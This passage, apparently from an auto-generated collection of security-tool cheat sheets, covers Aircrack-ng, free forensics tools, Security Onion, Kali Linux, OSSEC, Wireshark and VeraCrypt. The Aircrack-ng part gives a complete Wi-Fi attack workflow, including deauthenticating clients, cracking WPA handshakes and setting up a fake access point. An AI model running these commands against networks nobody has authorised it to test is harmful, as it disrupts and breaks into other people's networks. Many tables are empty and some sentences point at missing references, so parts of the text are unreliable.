versuck-ng

Default WEP key calculation for some routers

buddy-ng

Helper for easside-ng

WZCook

Recover WEP keys from Windows XP configs


4. Common Attack Vectors & Defense Techniques

Attack Vectors

  • Packet Capture & Injection: Capture Wi-Fi traffic and inject packets for analysis or attacks .

  • WEP/WPA/WPA2-PSK Cracking: Use captured handshakes and perform dictionary/brute-force attacks .

  • Deauthentication Attacks: Force clients to disconnect, capture handshake on reconnect.

  • Replay Attacks: Resend captured packets to generate more traffic.

  • Fake Access Points: Lure clients to rogue APs for MITM or credential capture .

  • ARP Request Replay: Generate IVs for WEP cracking.

Defense Techniques

  • Use Strong Encryption: Prefer WPA2/WPA3 with AES; avoid WEP .

  • Update Firmware: Patch routers and clients regularly.

  • Strong Passwords: Use complex, lengthy passphrases.

  • Network Monitoring: Detect deauth attacks, rogue APs.

  • MAC Filtering: Allow only known devices (not foolproof).

  • Disable SSID Broadcast: Hide network from casual scans.

  • Intrusion Detection Systems: Alert on suspicious activity.

  • User Education: Train users on Wi-Fi security best practices .


5. Advanced Techniques & Real-World Use

  • Multi-Stage Robust Optimization: Sequential decision-making under uncertainty, e.g., staged penetration tests .

  • Real-Time Optimization: Adjusting attack/defense strategies based on live data .

  • Case Studies: Used by security professionals in industries (e.g., GE, PayPal, NASA) for network audits and incident response .


6. Troubleshooting Common Issues

  1. Identify the Problem: Check error messages, logs, and recent changes .

  2. Basic Checks: Ensure wireless card supports monitor mode/injection; check connections .

  3. Gather Information: Use logs, dmesg, and Aircrack-ng output.

  4. Analyze Causes: Compatibility, driver issues, permissions, or misconfiguration .

  5. Implement Solutions: Try one fix at a time; e.g., switch drivers, update firmware.

  6. Test & Verify: Confirm each step before proceeding .

  7. Document Steps: Keep notes for future reference .

  8. Seek Help: Use forums, GitHub issues, or community channels .

  9. Prevent Recurrence: Regular updates, backups, and best practices .


7. Legal, Ethical, and Security Considerations

  • Authorization: Only test networks you own or have explicit permission to audit. Unauthorized use is illegal .

  • Compliance: Follow local, national, and international laws (e.g., GDPR, CCPA).

  • Privacy: Handle captured data responsibly; do not misuse sensitive information .

  • Transparency: Disclose findings responsibly; do not exploit vulnerabilities.

  • Risk Management: Limit testing to avoid network disruption; use in controlled environments .


8. Command Reference & Cheat Sheet

Basic Workflow

# 1. Enable monitor mode
sudo airmon-ng start wlan0

# 2. Capture packets and handshakes
sudo airodump-ng wlan0mon

# 3. Focus on a specific network (channel, BSSID)
sudo airodump-ng --bssid <BSSID> -c <channel> -w capture wlan0mon

# 4. Deauthenticate a client to capture handshake
sudo aireplay-ng --deauth 10 -a <BSSID> -c <client MAC> wlan0mon

# 5. Crack the key (WPA/WPA2)
aircrack-ng -w wordlist.txt -b <BSSID> capture-01.cap

# 6. Stop monitor mode
sudo airmon-ng stop wlan0mon

Common Commands

Command
Description

airmon-ng start wlan0

Enable monitor mode on wlan0

airmon-ng stop wlan0mon

Disable monitor mode

airodump-ng wlan0mon

Scan for networks and clients

airodump-ng --bssid <BSSID> -c <ch> -w out wlan0mon

Capture packets for a specific AP

aireplay-ng --deauth 10 -a <BSSID> wlan0mon

Deauth all clients from AP

aireplay-ng --deauth 10 -a <BSSID> -c <client>

Deauth specific client

aircrack-ng -w wordlist.txt -b <BSSID> capture.cap

Crack WPA/WPA2 handshake

airdecap-ng -w <key> capture.cap

Decrypt capture file with known key

airolib-ng db --import passwd wordlist.txt

Import wordlist into airolib-ng database

airolib-ng db --import essid <essidlist>

Import ESSIDs into airolib-ng database

airolib-ng db --batch

Batch process passphrases/ESSIDs

airbase-ng -e "FakeAP" -c 6 wlan0mon

Create a fake AP on channel 6

packetforge-ng

Create custom packets for injection

File Types

  • .cap – Packet capture file (PCAP format)

  • .ivs – Initialization vectors (for WEP cracking)

  • .hccapx – Handshake file for hashcat


9. Visual Reference

airodump-ng scanning for networks and clients

aircrack-ng performing a dictionary attack


10. Best Practices

  • Always use Aircrack-ng in a legal and ethical manner.

  • Keep your tools and wireless drivers up to date.

  • Use strong, unique passwords for your own networks.

  • Regularly audit your own Wi-Fi for vulnerabilities.

  • Document your process and findings for future reference.


11. Resources

  • Official Aircrack-ng Documentation

  • Kali Linux Aircrack-ng Guide

  • Aircrack-ng GitHub


This guide provides a comprehensive overview and quick reference for using Aircrack-ng effectively and responsibly.

Free Digital Forensics

Comprehensive Summary & Cheat Sheet: Free Digital Forensics Tools

This guide provides a categorized overview of the most widely used free digital forensics tools, including their core features, user/community reviews, technical requirements, and best practices for use. It is designed as a quick reference for investigators, students, and IT professionals.


1. Disk Imaging & Analysis Tools

FTK Imager

  • Core Features: Creates forensic images of hard drives, CDs, and USB devices; supports all major OS; recovers deleted files; previews data without altering evidence.

  • Reviews: Highly regarded for its reliability and ease of use. Frequently recommended in forensics forums for initial evidence acquisition.

  • Best Practices: Always verify image hashes post-acquisition to ensure integrity.

  • System Requirements: Windows OS; moderate RAM and storage.

  • Common Pitfalls: Not a full analysis suite—use in conjunction with other tools for deeper analysis .

Autopsy

  • Core Features: Open-source GUI for The Sleuth Kit; timeline analysis, hash filtering, file recovery, keyword search, and smartphone analysis.

  • Reviews: Praised for its user-friendly interface and extensibility. Community support is strong, with many plugins available.

  • Best Practices: Use modules for specific tasks (e.g., email analysis, EXIF data extraction).

  • System Requirements: Windows, Linux, macOS; Java required.

  • Common Pitfalls: Can be resource-intensive on large datasets .


2. Memory Forensics Tools

Volatility

  • Core Features: Open-source memory analysis framework; supports Windows, Linux, macOS memory dumps; extracts running processes, network connections, registry hives, and more.

  • Reviews: Considered the industry standard for memory forensics. Extensive documentation and plugin ecosystem.

  • Best Practices: Always use the correct profile for the memory image; update plugins regularly.

  • System Requirements: Python-based; cross-platform.

  • Common Pitfalls: Steep learning curve for beginners .

MAGNET RAM Capture

  • Core Features: Captures physical memory from Windows systems; lightweight and portable.

  • Reviews: Valued for its simplicity and reliability in volatile memory acquisition.

  • Best Practices: Use immediately upon incident discovery to preserve volatile evidence.

  • System Requirements: Windows OS.

  • Common Pitfalls: Acquisition only—requires other tools for analysis.


3. Network Forensics Tools

Wireshark

  • Core Features: Real-time network traffic capture and analysis; supports hundreds of protocols; advanced filtering and search.

  • Reviews: Universally praised for its depth and flexibility. Essential for network forensics and troubleshooting.

  • Best Practices: Use capture filters to limit data volume; anonymize sensitive data before sharing captures.

  • System Requirements: Windows, Linux, macOS; network card in promiscuous mode.

  • Common Pitfalls: Large captures can be unwieldy; privacy concerns if not handled properly .

Zeek (formerly Bro)

  • Core Features: Network analysis framework; logs network activity; scriptable for custom detection.

  • Reviews: Highly respected in enterprise environments for its scalability and depth.

  • Best Practices: Integrate with SIEMs for automated alerting.

  • System Requirements: Unix-like OS.

  • Common Pitfalls: Requires scripting knowledge for advanced use .


4. Open-Source Forensic Platforms

SIFT Workstation

  • Core Features: Ubuntu-based VM with a suite of forensic tools (Autopsy, Sleuth Kit, Volatility, etc.); ready-to-use environment.

  • Reviews: Endorsed by SANS Institute; considered a gold standard for comprehensive investigations.

  • Best Practices: Use as a dedicated forensic workstation; keep VM snapshots for repeatable analysis.

  • System Requirements: Virtualization software (VMware/VirtualBox); moderate to high system resources.

  • Common Pitfalls: Large download size; may require updates for latest tool versions .

CAINE (Computer Aided Investigative Environment)

  • Core Features: Live Linux distribution; includes tools for disk, memory, and network forensics; user-friendly interface.

  • Reviews: Appreciated for its breadth and ease of use, especially for live forensics.

  • Best Practices: Use as a bootable environment to avoid contaminating evidence.

  • System Requirements: Bootable on most hardware.

  • Common Pitfalls: Some tools may be outdated; check for updates .


5. File Carving Tools

Scalpel

  • Core Features: Fast file carving based on file headers/footers; recovers files from damaged or deleted partitions.

  • Reviews: Known for speed and effectiveness in data recovery scenarios.

  • Best Practices: Customize configuration for target file types.

  • System Requirements: Linux, Windows.

  • Common Pitfalls: May produce false positives; manual review of results recommended .


6. Hashing & Integrity Tools

HashKeeper

  • Core Features: MD5-based file signature database; helps identify known files and verify integrity.

  • Reviews: Useful for triage and filtering known good/bad files.

  • Best Practices: Regularly update hash databases.

  • System Requirements: Windows.

  • Common Pitfalls: MD5 is not collision-resistant; use as part of a broader integrity strategy .


7. Forensic Frameworks

Digital Forensics Framework (DFF)

  • Core Features: Collects, stores, and discloses digital evidence; supports scripting and automation.

  • Reviews: Flexible and extensible; good for custom workflows.

  • Best Practices: Use scripting for repetitive tasks.

  • System Requirements: Windows, Linux.

  • Common Pitfalls: Less user-friendly than GUI-based tools.

Open Computer Forensics Architecture (OCFA)

  • Core Features: Modular framework for large-scale forensic analysis; supports distributed processing.

  • Reviews: Suited for labs and organizations with high-volume needs.

  • Best Practices: Deploy in environments with multiple analysts.

  • System Requirements: Linux.

  • Common Pitfalls: Complex setup; steep learning curve .


8. Specialized Tools

John the Ripper

  • Core Features: Password cracking; supports many hash types; customizable attack modes.

  • Reviews: Popular for password recovery and security testing.

  • Best Practices: Use strong wordlists and rules for best results.

  • System Requirements: Windows, Linux, macOS.

  • Common Pitfalls: Can be slow on complex hashes .

Aircrack-ng

  • Core Features: Wi-Fi security assessment; packet capture, injection, and key cracking.

  • Reviews: Essential for wireless forensics; requires compatible hardware.

  • Best Practices: Use with a supported wireless card in monitor mode.

  • System Requirements: Linux, Windows.

  • Common Pitfalls: Legal restrictions on use; hardware compatibility issues .


9. OSINT & Web Forensics

Maltego

  • Core Features: Open-source intelligence gathering; data visualization; relationship mapping.

  • Reviews: Highly valued for mapping digital footprints and connections.

  • Best Practices: Use for initial reconnaissance and link analysis.

  • System Requirements: Java; Windows, Linux, macOS.

  • Common Pitfalls: Free version has limited features .

Burp Suite (Community Edition)

  • Core Features: Web application security testing; manual vulnerability scanning.

  • Reviews: Good for basic web forensics; advanced features require paid version.

  • Best Practices: Use for manual testing and learning web vulnerabilities.

  • System Requirements: Java; Windows, Linux, macOS.

  • Common Pitfalls: Limited automation in free version.


Best Practices & Usage Guidelines

  • Define Objectives: Know what you need to investigate before selecting tools.

  • Test in Controlled Environments: Always test tools on non-production systems first.

  • Document Everything: Maintain detailed logs of actions and findings.

  • Update Regularly: Keep tools and hash databases up to date.

  • Engage with Community: Participate in forums (e.g., Forensic Focus, r/computerforensics) for support and updates.

  • Avoid Common Pitfalls: Don’t skip compatibility checks, scalability planning, or thorough testing .


Installation & Compatibility

  • Check OS Support: Most tools support Windows and Linux; some require specific dependencies (e.g., Java, Python).

  • Resource Requirements: Imaging and analysis tools can be resource-intensive; ensure adequate RAM and storage.

  • Installation: Follow official guides; use VMs for platforms like SIFT and CAINE; troubleshoot using community FAQs .


Real-World Applications

  • Criminal Investigations: Tools like Autopsy and FTK Imager are used to recover deleted files and analyze suspect drives.

  • Incident Response: Volatility and SIFT Workstation are used to analyze memory dumps and trace malware activity.

  • Corporate Investigations: Wireshark and Zeek help detect data exfiltration and unauthorized access.

  • Legal Proceedings: Proper documentation and hash verification are critical for evidence admissibility .


Quick Reference Table

Tool
Category
OS Support
Key Features
Notable Limitation

Conclusion

Free digital forensics tools offer robust capabilities for evidence acquisition, analysis, and reporting. While they may lack some advanced features of commercial solutions, their reliability, community support, and extensibility make them indispensable for many investigations. Always combine multiple tools for comprehensive coverage, follow best practices, and stay engaged with the forensics community for the latest updates and support .

Security Onion

Security Onion Comprehensive Guide & Cheat Sheet

Security Onion is a powerful open-source platform for network security monitoring, intrusion detection, and log management. This guide provides a detailed overview, quick-reference cheat sheet, and best practices to help you deploy, operate, and troubleshoot Security Onion effectively.


Overview & Architecture

Security Onion is designed for both small labs and large enterprise environments. Its architecture is modular and scalable, supporting several deployment modes:

  • Import Node: For importing pcap/evtx files; standalone, no live traffic.

  • Evaluation Mode: For temporary testing with live traffic sniffing.

  • Standalone Deployment: For labs or low-throughput environments; logs flow through Logstash → Redis → Elasticsearch.

  • Distributed Deployment: Recommended for production; includes manager, forward, and search nodes for scalability.

  • Heavy Nodes: For special cases requiring high resources .

Security Onion Desktop Environment


Key Features

  • Network Security Monitoring (NSM)

  • Intrusion Detection (NIDS/HIDS)

  • Full Packet Capture

  • Log Management & SIEM

  • Dashboards & Visualization

  • Threat Hunting & Forensics

  • Alerting & Playbooks

  • Integration with open-source tools (Suricata, Zeek, Elastic Stack, etc.)


System Requirements & Deployment Scenarios

Minimum Requirements

  • CPU: 2+ cores (4–8 recommended)

  • RAM: 16GB minimum (32GB+ for larger deployments)

  • Disk: 200GB–1TB+ (depends on retention and traffic)

  • Network: Dedicated TAP or SPAN port for monitoring

Deployment Scenarios

  • Home Lab: For learning and personal device protection.

  • Enterprise: Master server with 8+ cores, 16–128GB RAM, multi-TB storage.

  • Medium Network: 16–128GB RAM, 100Mbps–1Gbps throughput.


Installation & Initial Setup

  1. Download Security Onion ISO from the official website.

  2. Create a VM (VirtualBox/VMware) or use dedicated hardware.

  3. Allocate Resources: 16GB+ RAM, 2–4+ CPU cores, 200GB+ disk.

  4. Configure Network: Add a management interface and a sniffing interface (TAP/SPAN).

  5. Boot from ISO and follow the installation prompts:

    • Set hostname, IP, and domain.

    • Choose deployment mode (Standalone, Distributed, etc.).

    • Configure management and sniffing interfaces.

  6. Complete Setup: Set up user accounts, passwords, and ensure internet access .


Core Components & Tools

Component
Purpose

Monitoring, Alerting, & Analysis

Monitoring

  • Network Traffic: Monitored via Suricata and Zeek.

  • Host Activity: Monitored via OSSEC.

  • Packet Capture: All traffic is captured for forensic analysis.

Alerting

  • IDS Alerts: Generated by Suricata/Zeek based on signatures and heuristics.

  • Playbooks & Guided Analysis: Help triage and respond to alerts efficiently.

  • Pivoting: Move from alert review to threat hunting seamlessly .

Analysis

  • Dashboards: Kibana provides customizable dashboards for visualizing events.

  • Hunt Menu: Enables proactive threat hunting.

  • Log Search: Elasticsearch allows fast querying of logs and events .


Integration & Extensibility

  • APIs & Connectors: Security Onion and its components (Elastic Stack, Zeek, Suricata) support APIs for integration.

  • SIEM Integration: Can forward logs to external SIEMs.

  • Threat Intelligence: Integrate with platforms like MISP for threat sharing.

  • Best Practices: Use standards-based integration, secure APIs, and follow access control best practices .


Best Practices

  • Use dedicated hardware for production; avoid resource contention in VMs.

  • Allocate sufficient resources (RAM, CPU, disk).

  • Use local storage over network storage for performance.

  • Set hostname/IP correctly during install; avoid changes post-install.

  • Avoid third-party software that may conflict with Security Onion.

  • Use TAPs instead of SPAN ports for reliable traffic capture.

  • Regularly update Security Onion; test updates in non-production first.

  • Engage with the community for support and shared knowledge .


Troubleshooting & Common Issues

  • Service Status: Use sudo so-status to check all services.

  • Log Flow: Use tcpdump and check logs for issues in Syslog-ng, Logstash, Elasticsearch.

  • Network Connectivity: Use ping and nc to verify node communication.

  • Resource Contention: Ensure VMs have dedicated resources.

  • File Permissions: Avoid manual changes; test hardening guidelines before applying.

  • Third-Party Conflicts: Do not install conflicting security agents or software .


Community & Documentation

  • Official Documentation:

  • Forums & Community: Engage on official forums, Reddit, and Stack Overflow.

  • Case Studies & Use Cases: Search for real-world deployments and success stories.

  • User Groups: Join community-driven groups for shared learning .


Cheat Sheet

Common Commands

Task
Command/Action

Web Interfaces

Tool
URL/Port

Log Locations

Component
Log Path

Useful Tips

  • Update regularly: sudo soup

  • Test in lab before production changes.

  • Monitor resource usage: htop, free -m, df -h

  • Backup configs before upgrades.


References

All information in this guide is based on the latest research and community best practices as of June 2025, and is supported by the provided research reports –.


For more details, always refer to the .

Kali Linux

Kali Linux Comprehensive Guide & Cheat Sheet

Kali Linux is a powerful, Debian-based distribution designed for digital forensics, penetration testing, and cybersecurity research. This guide provides a thorough overview, including fundamentals, installation, security best practices, tool usage, and further learning resources.


1. Fundamentals & History

Kali Linux is maintained by Offensive Security and is the successor to BackTrack Linux (2006–2013). It is tailored for security professionals, ethical hackers, and digital forensics experts. The name "Kali" is inspired by the Hindu goddess of time and change, reflecting the dynamic nature of the included tools .

Latest Version (2025.2) Highlights:

  • Menu Reorganization: Now follows the MITRE ATT&CK framework for easier tool discovery.

  • Desktop Updates: GNOME 48, KDE 6.3.

  • BloodHound Community Edition: Enhanced for Active Directory analysis.

  • NetHunter Enhancements: Wi-Fi injection for TicWatch Pro 3, new car hacking toolset (CARsenal).

  • 13 New Tools: Plus updates to existing ones.

  • Security & Privacy: Built-in tools for anonymity (Tor, proxychains).

  • Customization: Highly flexible for user needs.

  • Active Community: Regular updates and support .


2. Installation & Configuration

Installation Methods

  • Standard Install: Download ISO, create bootable USB/DVD, install on hardware.

  • Virtual Machine: Use VMware or VirtualBox for isolated environments.

  • Network Install: Deploy over a network for multiple machines.

  • Live Boot: Run directly from USB without installation [[Standard Practices]].

System Requirements

  • CPU: Modern multi-core processor.

  • RAM: Minimum 2GB (more recommended).

  • Storage: At least 20GB.

  • Network: Required for updates and tool downloads.

Configuration Best Practices

  • Download only from the .

  • Verify checksums of downloaded ISOs.

  • Create backups before installation.

  • Close unnecessary applications during install.

  • Customize tool selection during setup.

  • Document installation steps for reproducibility.

  • Test all features post-installation.

  • Keep the system and tools updated [[Standard Practices]].


3. Security Features & Hardening

Built-in Security Features

  • LUKS Full-Disk Encryption: Protects sensitive data.

  • Forensics Mode: Prevents auto-mounting of storage devices for data integrity .

Hardening Techniques

  • Regular Updates: Use apt update && apt upgrade frequently .

  • Firewall: Enable and configure UFW:

  • Disable Unnecessary Services:

  • Automatic Security Updates:

  • Antivirus: Install ClamAV for malware scanning.

Best Practices

  • Change all default passwords.

  • Use unprivileged accounts for daily tasks.

  • Prefer SSH key authentication over passwords.

  • Remove unused software.

  • Disable root login; use sudo for admin tasks .


4. Core Tools & Cheat Sheet

Categorized Tool List

Domain
Tools (Examples)

Essential Commands & Usage Patterns

Nmap (Network Scanning)

Metasploit Framework (Exploitation)

Wireshark (Packet Analysis)

Aircrack-ng (Wireless Attacks)

Hydra (Password Cracking)

John the Ripper (Password Cracking)

Burp Suite (Web App Testing)

Netcat (Networking)


5. Further Learning & Community Resources

  • Official Documentation:

  • Online Courses: MIT OpenCourseWare, Google for Education.

  • Community Resources: OER Commons, RDA Toolkit, CERT training.

  • Forums & Support: Kali Linux Forums, Reddit r/Kalilinux, Stack Overflow.

  • Government/Education: U.S. Department of Education cybersecurity resources .


6. Quick Reference Table

Task
Command/Tool Example

7. Best Practices Summary

  • Always use the latest version and keep tools updated.

  • Harden your system before using it for sensitive tasks.

  • Use strong, unique passwords and SSH keys.

  • Limit root access and use sudo.

  • Regularly back up important data.

  • Engage with the community for support and updates.


8. Visual Overview


9. References

All information in this guide is based on the latest official documentation, community resources, and best practices as of June 2025 .


This cheat sheet is designed to be a living document—refer to the and community forums for the most up-to-date information and advanced usage tips.

OSSEC

OSSEC Comprehensive Guide & Cheat Sheet


Introduction to OSSEC

OSSEC (Open Source Security Event Correlator) is a powerful, open-source, host-based intrusion detection system (HIDS). It provides log analysis, file integrity checking, policy monitoring, rootkit detection, real-time alerting, and active response across multiple platforms (Linux, Windows, macOS, Solaris, BSD) .


Architecture & Components

OSSEC uses a client-server (manager-agent) architecture:

  • Manager (Server): Central component that receives, stores, and analyzes data from agents and other sources. It generates alerts and manages responses .

  • Agents: Installed on monitored endpoints. They collect logs, monitor files, and send data to the manager.

  • Agentless Monitoring: For devices that cannot run an agent (e.g., routers, switches), OSSEC can collect logs via SSH, WMI, or syslog.

  • Decoders: Parse and normalize log messages.

  • Rules: Define what constitutes suspicious or malicious activity.

  • Active Responses: Automated actions triggered by specific events (e.g., block IP, disable account) .


Key Features

  • Log Analysis: Real-time analysis of logs from various sources (syslog, Windows Event Logs, application logs).

  • File Integrity Monitoring (FIM): Detects unauthorized changes to critical files.

  • Rootkit Detection: Scans for rootkits and suspicious binaries.

  • Registry Monitoring: Monitors Windows registry changes.

  • Real-Time Alerting: Immediate notification of security events.

  • Active Response: Automated mitigation actions.

  • Centralized Management: Unified policy enforcement and alerting .


Installation & Deployment

Supported Platforms

  • Linux/Unix: Most distributions supported.

  • Windows: All major versions.

  • macOS, Solaris, BSD: Supported.

Deployment Scenarios

  • Single Host: Manager and agent on the same machine.

  • Distributed: Central manager with multiple agents across the network.

  • Agentless: For devices that cannot run an agent.

Installation Steps (Linux Example)

  1. Download OSSEC:

  2. Run Installer:

    • Choose "server" or "agent" as appropriate.

  3. Configure Firewall: Allow communication on the default port (1514/UDP).

  4. Start OSSEC:

  5. Agent Registration: On the manager, add agents and provide keys for secure communication.

For Windows, use the provided installer and follow the GUI prompts.

Large-Scale/Automated Deployment

  • Use configuration management tools (Ansible, Puppet, Chef).

  • For agentless, configure SSH/WMI access.


Configuration Essentials

ossec.conf Overview

The main configuration file is /var/ossec/etc/ossec.conf. It is XML-based and controls all aspects of OSSEC.

Key Sections:

  • <global>: General settings.

  • <rules>: Rule files to load.

  • <decoders>: Decoder files to load.

  • <active-response>: Automated response actions.

  • <syscheck>: File integrity monitoring.

  • <rootcheck>: Rootkit detection.

  • <alerts>: Alerting configuration.

Example ossec.conf Snippet


Rules

  • Location: /var/ossec/etc/rules/

  • Format: XML

  • Purpose: Define what log patterns trigger alerts.

  • Customization: Add custom rules for your environment. Always back up custom rules before upgrades .

Example Rule


Decoders

  • Location: /var/ossec/etc/decoders/

  • Purpose: Parse and extract fields from log messages.

  • Customization: Write custom decoders for unique log formats. Back up before upgrades .

Example Decoder


Active Responses

  • Purpose: Automate mitigation (e.g., block IP, disable user).

  • Configuration: Each response in its own <active-response> block in ossec.conf .

  • Key Options:

    • command: The script or action to run.

    • location: Where to execute (local, server, agent).

    • level: Minimum alert level to trigger.

    • timeout: How long the response lasts.

Example Active Response


Monitoring & Log Analysis

  • Log Sources: Internal logs, Windows Event Logs, syslog, application logs.

  • Logcollector: Collects events from sources.

  • Analysisd: Decodes, filters, and classifies events in real-time .

  • Supported Formats: syslog, snort, squid, IIS, MySQL, PostgreSQL, Apache, and more .

  • Capabilities: Detects attacks, misuse, policy violations, and system errors .


Alerting & Response

  • Real-Time Alerts: Immediate notification via email, syslog, or custom scripts .

  • Alert Levels: 0 (ignore) to 15 (critical).

  • Active Response: Automated actions (e.g., block IP, restart service).

  • Centralized Policy Enforcement: Uniform security policies across all monitored devices .


Integration with Other Tools & SIEM

  • SIEM Integration: OSSEC can send logs/alerts to SIEMs like ELK Stack (Elasticsearch, Logstash, Kibana), Graylog, and Splunk for advanced analysis and visualization .

  • Other Security Tools: Integrates with Snort, Suricata, Zeek for network security monitoring .

  • Log Management: Centralized log collection and advanced search via Graylog or Elastic Stack .

  • Community Support: Strong community for plugins, integrations, and troubleshooting .


Maintenance, Troubleshooting & Best Practices

Troubleshooting

  • Identify Problems: Check logs in /var/ossec/logs/ for errors.

  • Systematic Approach: Isolate the issue (agent, manager, network).

  • Diagnostic Tools: Use OSSEC's built-in tools and system utilities.

  • Common Issues: Agent connectivity, rule misconfiguration, permission errors.

Maintenance

  • Preventive: Regularly update OSSEC, review rules/decoders, and back up configurations .

  • Corrective: Address alerts and incidents promptly, verify system integrity .

  • Routine: Clean up old logs, rotate log files, and monitor system performance.

Best Practices

  • Backup: Always back up custom rules, decoders, and configuration files before upgrades .

  • Least Privilege: Run OSSEC with minimal required permissions.

  • Regular Updates: Keep OSSEC and all dependencies up to date.

  • Training: Ensure staff are trained on OSSEC operation and incident response .

  • Feedback Loops: Review and refine rules based on incident feedback .


Community & Resources

  • Official Website:

  • GitHub:

  • Forums: OSSEC Google Group, Stack Overflow, Reddit

  • Documentation:

  • Related Projects: (OSSEC fork with extended features)

  • Blogs & Case Studies: Search for real-world use cases and example configurations on GitHub, company blogs, and security forums.


Quick Reference Cheat Sheet

Common Commands

Command
Description

Key File Locations

File/Directory
Purpose

Alert Levels

Level
Description

Useful Links


Wireshark

Wireshark Comprehensive Guide & Cheat Sheet

Wireshark is the world’s most popular open-source network protocol analyzer, used for network troubleshooting, analysis, software and protocol development, and education. This guide provides a thorough overview, practical tips, and a quick-reference cheat sheet to help you master Wireshark.


What is Wireshark?

Wireshark is a powerful, open-source network protocol analyzer that captures and displays data packets traveling through a network in real time or from saved files. It is widely used by network administrators, security professionals, and developers for troubleshooting, security analysis, and protocol development .

Key Features:

  • Cross-platform (Windows, macOS, Linux)

  • Live capture and offline analysis

  • Deep inspection of hundreds of protocols

  • Powerful filtering capabilities

  • User-friendly graphical interface

  • Modular, extensible architecture

Wireshark 3.6 Screenshot


Installation & System Requirements

Windows

  • Requirements: Windows 10 or later, 1 GHz CPU, 2 GB RAM, 16–20 GB disk space

  • Install: Download from , run installer, follow prompts .

Linux

  • Requirements: Compatible kernel, 2 GB RAM, sufficient disk space, root/sudo access

  • Install: Use package manager (e.g., sudo apt install wireshark), configure permissions for non-root capture .

macOS

  • Requirements: Supported macOS version, 2 GB RAM, sufficient disk space

  • Install: Download from website or use Homebrew (brew install wireshark) .

Note: Ensure your network interface supports promiscuous mode for full packet capture.


User Interface Overview

Wireshark’s interface is designed for efficient navigation and analysis:

  • Main Menu Bar: File, Edit, View, Go, Capture, Analyze, Statistics, Help .

  • Main Toolbar: Quick access to start/stop capture, open/save files, apply filters.

  • Filter Toolbar: Enter display filters to refine packet view .

  • Interface List: Select network interface for capture.

  • Packet List Pane: Shows captured packets (number, time, source, destination, protocol, info).

  • Packet Details Pane: Hierarchical breakdown of selected packet’s protocol layers .

  • Packet Bytes Pane: Raw packet data in hexadecimal .


Fundamental Concepts & Architecture

  • Packet Analysis: Captures and dissects network packets, showing headers, payloads, and protocol details .

  • Network Sniffing: Intercepts and logs network traffic for analysis.

  • Open Source: Free, community-driven, extensible.

  • Modular Architecture: Capture engine (pcap), protocol dissectors, GUI .


Packet Capture Techniques

  • Promiscuous Mode: Captures all packets on the network segment.

  • Monitor Mode: For wireless networks, captures all wireless traffic .

  • Start/Stop Capture: Select interface, click the shark fin icon to start, red square to stop.

  • Save/Export: Save captures as .pcap files for later analysis.


Filters: Capture & Display

Capture Filters

  • Set before capture to limit what is recorded.

  • Syntax: Based on libpcap (tcpdump) language.

  • Examples:

    • Capture only HTTP: tcp port 80

    • Capture traffic from IP: host 192.168.1.1

    • Capture only TCP: tcp

  • Set in: Capture Options dialog .

Display Filters

  • Set after capture to refine what is shown.

  • Syntax: Wireshark-specific, more flexible.

  • Examples:

    • Show packets from IP: ip.addr == 192.168.1.1

    • Show DNS traffic: dns

    • Show TCP SYN packets: tcp.flags.syn == 1

  • Apply in: Filter toolbar .


Protocol Analysis Features

  • Packet Dissection: View protocol layers and fields in detail.

  • Protocol Decoding: Human-readable decoding for hundreds of protocols.

  • Filtering: Both capture and display filters for focused analysis.

  • Statistics Tools: Protocol hierarchy, conversations, endpoints, IO graphs.

  • Expert Information: Highlights errors, warnings, and protocol violations .


Common Analysis Scenarios

  • Troubleshooting: Diagnose slow networks, dropped connections, misconfigurations.

  • Security Analysis: Detect unauthorized access, malware, data exfiltration.

  • Performance Optimization: Identify bottlenecks, excessive retransmissions.

  • Compliance Verification: Ensure protocol standards are followed.

  • Protocol Development: Test and debug new or modified protocols .


Troubleshooting Best Practices

  1. Identify the Problem: Gather logs, error messages, user reports .

  2. Determine Scope: Isolate affected systems or segments .

  3. Establish Theory: Hypothesize likely causes based on symptoms .

  4. Test Theory: Use Wireshark to confirm or refute hypotheses .

  5. Propose & Test Solution: Implement fixes, monitor results.

  6. Collect Sufficient Data: Replicate issues, ensure enough packet data is captured.

  7. Use Actionable Filters: Apply specific filters to focus on relevant traffic.

  8. Analyze Patterns: Look for anomalies, repeated errors, or protocol violations .


Keyboard Shortcuts & Quick Reference

Action
Shortcut (Windows/Linux)
Shortcut (macOS)

Real-World Applications & Case Studies

  • Network Forensics: Analyzing malware (e.g., Zeus Botnet), reconstructing attacks.

  • CTF Challenges: Used in security competitions for traffic analysis.

  • Malware Traffic Analysis: Identifying command-and-control traffic, data exfiltration.

  • DNS Troubleshooting: Diagnosing resolution failures, cache poisoning.

  • Real-Time Forensics: Portable Wireshark setups for incident response.

  • Performance Analysis: Identifying latency, retransmissions, and bottlenecks .


Cheat Sheet

Common Capture Filters (set before capture)

  • Only TCP: tcp

  • Only UDP: udp

  • Only HTTP: tcp port 80

  • Only traffic from IP: host 192.168.1.1

  • Only traffic to/from subnet: net 192.168.1.0/24

  • Only traffic to port: port 443

Common Display Filters (set after capture)

  • All HTTP: http

  • All DNS: dns

  • Source IP: ip.src == 192.168.1.1

  • Destination IP: ip.dst == 10.0.0.5

  • TCP SYN packets: tcp.flags.syn == 1

  • TCP retransmissions: tcp.analysis.retransmission

  • Show only errors: tcp.analysis.flags && !tcp.analysis.ack_rtt

Useful Statistics Tools

  • Protocol Hierarchy: Statistics > Protocol Hierarchy

  • Conversations: Statistics > Conversations

  • Endpoints: Statistics > Endpoints

  • IO Graphs: Statistics > IO Graphs

Tips

  • Coloring Rules: Use to highlight traffic types (View > Coloring Rules).

  • Profiles: Create profiles for different analysis scenarios (Edit > Configuration Profiles).

  • Expert Info: Use for quick error/warning overview (Analyze > Expert Information).


Additional Resources


By mastering these concepts, techniques, and shortcuts, you can leverage Wireshark for everything from basic troubleshooting to advanced network forensics and security analysis. Wireshark’s flexibility and depth make it an indispensable tool for anyone working with networks .

VeraCrypt

VeraCrypt Comprehensive Guide & Cheat Sheet

VeraCrypt is a free, open-source disk encryption software designed to secure your data through robust encryption algorithms and advanced features. This guide provides a thorough overview, practical instructions, and a quick-reference cheat sheet for both beginners and advanced users.


Core Features & Functionality

  • Whole-Disk & Partition Encryption: Encrypts entire disks or partitions, including system drives, with pre-boot authentication.

  • Hidden Volumes & OS: Supports hidden volumes and even hidden operating systems for plausible deniability.

  • Multiple Encryption Algorithms: Choose from AES, Serpent, Twofish, Camellia, Kuznyechik, and combinations thereof.

  • Cross-Platform: Available for Windows, macOS, and Linux.

  • Open Source & Free: No cost, with transparent code and regular security audits.

  • Rescue Disk: Create a rescue disk for system recovery in case of bootloader or decryption issues.

  • No Cloud Integration: Focuses on local encryption only.

